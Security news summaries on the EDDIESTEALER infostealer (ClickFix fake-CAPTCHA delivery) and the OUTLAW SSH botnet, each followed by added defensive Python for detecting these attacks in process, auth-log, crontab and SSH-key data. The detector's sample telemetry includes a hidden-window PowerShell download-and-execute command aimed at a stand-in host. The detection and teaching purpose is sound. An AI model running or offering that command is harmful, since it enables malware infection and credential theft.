@securityonline.info
//
A new Rust-based infostealer, EDDIESTEALER, is being spread with the ClickFix social engineering technique, according to a report published by Elastic Security Labs on May 30, 2025. The lure is a fake CAPTCHA prompt served from compromised websites: to "verify they are not a robot", users are told to copy a PowerShell command and paste it into a Windows terminal. That command downloads and executes a malicious JavaScript file, gverify.js, which in turn retrieves the final EDDIESTEALER payload.
EDDIESTEALER is built to steal sensitive information from infected hosts. Written in Rust, it hampers static analysis through XOR string encryption and stripped function symbols, and it resolves the Windows APIs it needs through a custom lookup routine, so its API usage does not show up under static inspection either. Rather than carrying a fixed target list, the malware pulls a task list from its command-and-control (C2) server at run time, so operators can change what it collects without shipping a new binary; Elastic Security Labs has seen it tasked against cryptocurrency wallets, web browsers, password managers, FTP clients and the Telegram messaging app. It also performs a basic anti-sandbox check and deletes itself from disk after running. Researchers point to the continued popularity of ClickFix as an initial-access technique and to the growing adoption of Rust by malware developers in campaigns like this one.
@securityonline.info
//
Elastic Security Labs has identified a new information stealer, EDDIESTEALER, a Rust-based malware distributed through fake CAPTCHA campaigns. The campaigns trick users into running a malicious PowerShell command, which then deploys the infostealer onto their systems. EDDIESTEALER is hosted on multiple adversary-controlled web properties and relies on the ClickFix social engineering tactic, luring victims with a bogus CAPTCHA verification step. The malware harvests sensitive data, including credentials, browser data and cryptocurrency wallet details.
The attack chain begins with threat actors compromising legitimate websites and injecting JavaScript that renders a bogus CAPTCHA check page. Users are instructed to copy a PowerShell command and paste it into their Windows terminal as "verification"; the command retrieves and executes a JavaScript file, gverify.js, which in turn fetches the EDDIESTEALER binary from a remote server and writes it to the user's Downloads folder under a pseudorandom filename. Once running, the malware pulls its configuration from a command-and-control server, letting the operators adjust its behaviour and choose which programs to target. It collects system metadata and siphons data of interest from the host, covering cryptocurrency wallets, web browsers, password managers, FTP clients and messaging apps such as Telegram. Its anti-analysis measures include string encryption, a custom WinAPI lookup mechanism and a mutex that prevents a second instance from running. It also performs anti-sandbox checks and removes itself from disk using NTFS Alternate Data Streams (the running executable's primary data stream is renamed into an alternate stream and the file is then marked for deletion, so the binary disappears from disk while the process keeps running). The dynamic C2 tasking gives the operators flexibility, underlining both the ongoing threat from ClickFix campaigns and the growing use of Rust in malware development.
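Both EDDIESTEALER summaries above describe the same observable chain on the endpoint: a PowerShell launch that the user pasted, a download-and-execute command line, and a JavaScript file (gverify.js) run afterwards. The following is an added example, not code from the article or from Elastic Security Labs: a small Python detector run over constructed Sysmon Event ID 1-style process events that scores each PowerShell launch on those traits. The assumption that the downloaded script is executed through wscript.exe or cscript.exe, and all host names, paths and the example.invalid URL, are mine.

```python
"""Flag a ClickFix-style chain in process-creation telemetry.

Added example for the EDDIESTEALER write-ups; not code from the article or
from Elastic Security Labs. Walks constructed events shaped like Sysmon
Event ID 1 (pid, parent pid, image, command line) and scores each PowerShell
launch on: parent explorer.exe (what a paste into the Run dialog or a
freshly opened console looks like), a command line that fetches and runs
remote content, hidden-window / policy-bypass flags, and a child script host
executing a .js file. Running the JS via wscript/cscript is an assumption;
hosts, paths and URLs are made up.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # command line as logged


POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_FACING_PARENTS = {"explorer.exe"}  # Win+R / Run dialog launches run under explorer.exe

DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|\bcurl\b", re.I)
EXEC_RE = re.compile(r"\biex\b|Invoke-Expression|\bwscript\b|\bcscript\b|Start-Process", re.I)
EVASION_RE = re.compile(
    r"-(?:w|win|windowstyle)\s+h(?:idden)?\b|-nop\b|-(?:ep|ExecutionPolicy)\s+bypass", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_clickfix_chains(events, min_reasons=3):
    """Return one alert per PowerShell process that shows at least min_reasons traits."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        if basename(ev.image) not in POWERSHELL:
            continue
        reasons = []
        parent = by_pid.get(ev.ppid)
        if parent is not None and basename(parent.image) in USER_FACING_PARENTS:
            reasons.append(f"launched from {basename(parent.image)} (user paste / Run dialog)")
        if DOWNLOAD_RE.search(ev.cmdline):
            reasons.append("command line fetches remote content")
        if EXEC_RE.search(ev.cmdline):
            reasons.append("command line executes what it fetched")
        if EVASION_RE.search(ev.cmdline):
            reasons.append("hidden window / execution-policy bypass flags")
        for child in events:
            if (child.ppid == ev.pid and basename(child.image) in SCRIPT_HOSTS
                    and re.search(r"\.js\b", child.cmdline, re.I)):
                reasons.append(f"child {basename(child.image)} runs a .js file: {child.cmdline}")
        if len(reasons) >= min_reasons:
            alerts.append({"pid": ev.pid, "cmdline": ev.cmdline, "reasons": reasons})
    return alerts


# Constructed telemetry: one ClickFix chain and one ordinary admin session.
SAMPLE_EVENTS = [
    ProcEvent(4, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1200, 4, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -nop -c "iwr http://captcha.example.invalid/gverify.js '
              '-OutFile $env:TEMP\\gverify.js; wscript $env:TEMP\\gverify.js"'),
    ProcEvent(1310, 1200, r"C:\Windows\System32\wscript.exe",
              r"wscript C:\Users\alice\AppData\Local\Temp\gverify.js"),
    ProcEvent(900, 4, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(950, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -NoProfile -Command Get-Process | Sort-Object CPU"),
]

if __name__ == "__main__":
    for alert in find_clickfix_chains(SAMPLE_EVENTS):
        print(f"pid {alert['pid']}: {alert['cmdline']}")
        for reason in alert["reasons"]:
            print("  -", reason)
```

The explorer.exe parent on its own is a weak signal (every shortcut a user double-clicks also has it), which is why the detector requires several traits before alerting; the script-host child and the download-plus-execute command line are the ones that carry the weight. On real telemetry the same logic applies to EDR process events, and a follow-on rule can watch for the script host writing a new executable into the Downloads folder, which is where the second summary says the final payload lands.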
info@thehackernews.com (The Hacker News)
//
The OUTLAW Linux botnet is expanding rapidly by brute-forcing SSH servers that accept weak credentials. Researchers describe the botnet, also tracked as Dota, as an "auto-propagating" cryptocurrency mining operation that relies on simple but effective techniques to keep its foothold on compromised systems: logging in with guessed credentials, manipulating SSH authorized keys so it can get back in, and installing cron jobs that restart the malware after a reboot or after the process is killed.
Infection is multi-stage. A dropper shell script downloads and unpacks a malicious archive, which launches a modified XMRig miner for cryptojacking and places its components in hidden directories to avoid detection. A custom SSH brute-forcer called BLITZ then scans for other reachable systems with weak SSH credentials and infects them, so the botnet spreads in a worm-like fashion. Despite these basic techniques, OUTLAW has proven to be a persistent and effective threat.
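The three behaviours above (credential brute force followed by a successful login, cron-based restarts, and components kept in hidden directories, with SSH keys manipulated for re-entry) are all visible on the host. As an added example that is not code from the article or from the researchers who analysed OUTLAW, the Python below hunts for each of them over constructed inputs: sshd lines from auth.log, a crontab, and an authorized_keys file compared against a recorded baseline. The addresses are TEST-NET, the key blobs are made up, and the six-failures-in-five-minutes threshold is an assumption to tune per environment.

```python
"""Hunt for OUTLAW-style SSH brute force and persistence on a Linux host.

Added example, not code from the article or from the researchers behind the
OUTLAW analysis. Every log line, crontab entry and key below is constructed
(TEST-NET addresses, made-up key blobs); threshold and window are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Both outcomes of an OpenSSH authentication attempt, syslog-style.
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<kind>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

def parse_sshd(lines):
    events = []
    for line in lines:
        m = SSHD_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year-less syslog stamp
            events.append((ts, m["kind"], m["user"], m["ip"]))
    return sorted(events)

def detect_bruteforce(lines, threshold=6, window=timedelta(minutes=5)):
    """Per source IP: flag >= threshold failures inside a sliding window, then
    record any Accepted login from that IP afterwards (the worm got in)."""
    recent = defaultdict(list)   # ip -> failure timestamps still inside the window
    total = defaultdict(int)     # ip -> every failure seen from that ip
    findings = {}
    for ts, kind, user, ip in parse_sshd(lines):
        if kind == "Failed":
            total[ip] += 1
            recent[ip] = [t for t in recent[ip] if ts - t <= window] + [ts]
            if len(recent[ip]) >= threshold or ip in findings:
                findings.setdefault(ip, {"compromised_user": None})["total_failed"] = total[ip]
        elif kind == "Accepted" and ip in findings:
            findings[ip]["compromised_user"] = user
    return findings

HIDDEN_DIR_RE = re.compile(r"/\.[^/\s.]")  # a path component that starts with a dot

def suspicious_cron(lines):
    """Crontab lines that would relaunch or refresh a payload kept in a dot-directory."""
    hits = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if line.startswith("@reboot"):
            reasons.append("@reboot persistence")
        if HIDDEN_DIR_RE.search(line):
            reasons.append("command lives in a hidden directory")
        if re.search(r"\b(?:wget|curl)\b|base64 -d", line):
            reasons.append("fetches or decodes content at run time")
        if reasons:
            hits.append((line, reasons))
    return hits

def key_identity(line):
    """(type, blob) of an authorized_keys line, skipping any options prefix."""
    parts = line.split()
    for i, tok in enumerate(parts[:-1]):
        if tok.startswith(("ssh-", "ecdsa-", "sk-")):
            return (tok, parts[i + 1])
    return None

def new_authorized_keys(current, baseline):
    """Keys present now that were absent from a previously recorded baseline."""
    known = {key_identity(l) for l in baseline} - {None}
    return [l.strip() for l in current if key_identity(l) and key_identity(l) not in known]

# Constructed samples: a failure burst then a success from one address, a normal login from another.
SAMPLE_AUTH_LOG = [
    "Jun 01 03:14:01 web1 sshd[2101]: Failed password for root from 203.0.113.77 port 41022 ssh2",
    "Jun 01 03:14:03 web1 sshd[2103]: Failed password for invalid user admin from 203.0.113.77 port 41030 ssh2",
    "Jun 01 03:14:05 web1 sshd[2105]: Failed password for invalid user test from 203.0.113.77 port 41038 ssh2",
    "Jun 01 03:14:08 web1 sshd[2107]: Failed password for root from 203.0.113.77 port 41044 ssh2",
    "Jun 01 03:14:10 web1 sshd[2109]: Failed password for deploy from 203.0.113.77 port 41052 ssh2",
    "Jun 01 03:14:13 web1 sshd[2111]: Failed password for deploy from 203.0.113.77 port 41060 ssh2",
    "Jun 01 03:14:19 web1 sshd[2115]: Accepted password for deploy from 203.0.113.77 port 41076 ssh2",
    "Jun 01 09:00:00 web1 sshd[3000]: Failed password for alice from 198.51.100.5 port 50000 ssh2",
    "Jun 01 09:00:05 web1 sshd[3001]: Accepted publickey for alice from 198.51.100.5 port 50001 ssh2",
]
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "@reboot /home/www/.shared/a/run >/dev/null 2>&1",
    "*/5 * * * * /home/www/.shared/b/sync >/dev/null 2>&1",
]
SAMPLE_KEYS_BASELINE = ["ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMADEUPBLOBalice alice@laptop"]
SAMPLE_KEYS_NOW = SAMPLE_KEYS_BASELINE + [
    "no-port-forwarding ssh-rsa AAAAB3NzaC1yc2EAAAADAQABMADEUPBLOBplanted unknown"]
```

The brute-force detector only treats a source as interesting once it crosses the threshold, so a user who mistypes a password once is never reported, while an address that hammers the service and then succeeds is reported together with the account it got into, which is the case that needs an immediate response. The cron and key checks are baseline comparisons rather than signatures: a legitimate job under ~/.local/bin will trip the hidden-directory rule, so review the hits rather than acting on them blindly, and keep the authorized_keys baseline somewhere the host cannot rewrite.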